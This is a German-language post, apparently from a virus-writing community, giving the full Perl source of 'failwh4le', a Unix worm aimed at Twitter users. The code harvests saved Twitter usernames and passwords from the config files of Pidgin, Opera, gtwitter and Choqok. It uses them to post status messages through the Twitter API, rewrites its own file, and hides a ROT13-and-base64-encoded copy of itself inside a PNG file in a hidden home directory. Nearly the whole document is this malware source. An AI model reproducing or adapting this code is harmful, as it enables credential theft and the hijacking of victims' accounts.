[+]Topic: Code
[+]Von: Perforin
[+]Return: Code
Failwh4le ist ein *NIX Twitter Wurm. Dabei liest er die Login Informationen
von einigen gängigen Twitter Clients aus und benutzt dann die Twitter API
um sich zu verbreiten!
Kann jedoch nun sein, dass der Wurm so nicht mehr funktioniert, da Twitter
die Basic authentication beschränkt oder ganz abgeschaltet hat =/
#!/usr/bin/perl
# failwh4le! by Perforin - vxnetw0rk
use LWP::UserAgent;
use HTTP::Request;
use HTTP::Request::Common;
use MIME::Base64;
if ($^O !~ m/linux/i) { exit; }
$switch = 0;
open(ME,"<",$0);
@me = ;
close(ME);
if ($switch eq 0) { pidgin(); }
if ($switch eq 1) { credits(); }
sub credits {
print decode_base64("
PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT0NCj0gV2VsY29tZSB0byB5
b3VyIHBvbHltb3JwaGljIG5pZ2h0bWFyZSA9DQo9PT09PT09PT09PT09PT09PT09PT09PT09PT09
PT09PT09PT09PT09PQ0KPT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT0N
Cj09PT09PT09PSBmYWlsd2g0bGUhIC0gUGVyZm9yaW4gPT09PT09PT09DQo9PT09PT09PT09PT09
PT09PT09PT09PT09PT09PT09PT09PT09PT09PQ0KDQpHcmVldHogdG86DQpTa3lPdXQNClNoYVEN
ClJheWRlbg0KU3BoMW5YDQpKYWNrVA0KV2FyR2FtZQ0KDQpDb25maWNrZXIgaXMgYSBsaWUhIDpE") . "\n";
foreach $line (@me) {
$encnt++;
if ($line =~ m/^\$switch/) { $line = '$switch = 0;' . "\n"; }
if ($line =~ m/^#failwh4le!*$/) { $line = ' ' . "\n"; }
push(@vir,$line);
}
open(myown,">",$0);
print myown @vir;
close(myown);
exit;
}
sub pidgin {
open(pidgin,"<","$ENV{'HOME'}/.purple/accounts.xml") || opera();
@pidgin = ;
$lngt = scalar(@pidgin);
foreach $ar (@pidgin) {
$cnt++;
if ($ar =~ m/\prpl-twitter\<\/protocol\>/) { @rest = @pidgin[$cnt..$lngt]; }
}
foreach $tw (@rest) {
if ($tw =~ m/\(.*)\<\/name\>/) { $tname = $1; push(@TNAME,$tname); }
if ($tw =~ m/\(.*)\<\/password\>/) { $tpass = $1; push(@TPASS,$tpass); }
}
close(pidgin);
twitter();
}
sub opera {
open(opera,"<","$ENV{'HOME'}/.opera/widgets/widgets.dat") || gtwitter();
while () {
if ($_ =~ m/\(.*)\<\/value\>/i) { $tuser0 = $1; push(@TNAME,$tname0); }
if ($_ =~ m/\(.*)\<\/value\>/i) { $tpass0 = decode_base64($1); push(@TPASS,$tpass0); }
}
close(opera);
twitter();
}
sub gtwitter {
open(gtwitter,"<","$ENV{'HOME'}/.gconf/apps/gtwitter/%gconf.xml") || choqokrc();
while () {
if ($_ =~ m/\(.*)\<\/stringvalue\>/) {
$cnt++;
if ($cnt == 1) { $tpass1 = $1; push(@TPASS,$tpass1); } else { $tname1 = $1; push(@TNAME,$tname1); }
}
}
close(gtwitter);
twitter();
}
sub choqokrc {
open(choqokrc,"<","$ENV{'HOME'}/.kde/share/config/choqokrc") || die && print "Get choqokrc as your new twitter client!";
while () {
if ($_ =~ m/password=(.*)/) { $tpass2 = $1; push(@TPASS,$tpass2); }
if ($_ =~ m/username=(.*)/) { $tname2 = $1; push(@TNAME,$tname2); }
}
close(choqokrc);
twitter();
}
sub twitter {
@agents = ('Lynx/2.8.4rel.1 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.6c',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; WOW64; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)',
'Mozilla/4.77 [en] (X11; I; IRIX;64 6.5 IP30)',
'Mozilla/5.0 (compatible; Konqueror/3.2; Linux 2.6.2) (KHTML, like Gecko)',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/125.2 (KHTML, like Gecko) Safari/125.8',
'Mozilla/5.0 (OS/2; U; Warp 4.5; de; rv:1.8.1.11) Gecko/20071129 PmWFx/2.0.0.11',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.13 (KHTML, like Gecko) Chrome/0.A.B.C Safari/525.13',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10',
'Mozilla/5.0 (X11; U; Linux i586; en-US; rv:1.7.3) Gecko/20040924 Epiphany/1.4.4 (Ubuntu)',
'Opera/9.80 (Macintosh; Intel Mac OS X; U; en) Presto/2.2.15 Version/10.00');
@payload = ('Gimme all your Twitter Logins =)',
'Hey I execute every perl skript I get! #failwh4le',
'failwh4le on his way to world domination!',
'vxnetw0rk - german vx community',
'failwh4le! by Perforin - vxnetw0rk');
$paymsg = @payload[int(rand(5))];
$slengthpaymsg = length($paymsg);
$useragent = LWP::UserAgent->new;
$useragent->request(POST 'http://twitter.com/statuses/update.xml',
User-Agent => @agents[int(rand(11))],
Authorization => "Basic " . encode_base64("@TNAME:@TPASS"),
Host => 'twitter.com',
Accept => '*/*',
Content-Length => $lengthpaymsg,
Content-Type => 'application/x-www-form-urlencoded',
Content => [ status => $paymsg ] );
out();
}
sub out {
foreach $line (@me) {
$encnt++;
if ($line =~ m/^\$switch/) { $line = '$switch = 1;' . "\n"; }
if ($line =~ m/^\s*$/) { $line = '#failwh4le!' . "\n"; }
push(@vir,$line);
}
mkdir("$ENV{'HOME'}/.failwh4le!",0777);
open(vir,">","$ENV{'HOME'}/.failwh4le!/failwh4l3!.PNG") || unlink $0;
print vir decode_base64("
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");
@abgang = encode_base64(@vir);
foreach $wsx (@abgang) {
$wsx =~ tr/a-zA-Z/N-ZA-Mn-za-m/;
print vir $wsx;
}
print vir '#Maybe you will find me here or not. failwh4le is on his way!';
close(vir);
exit;
}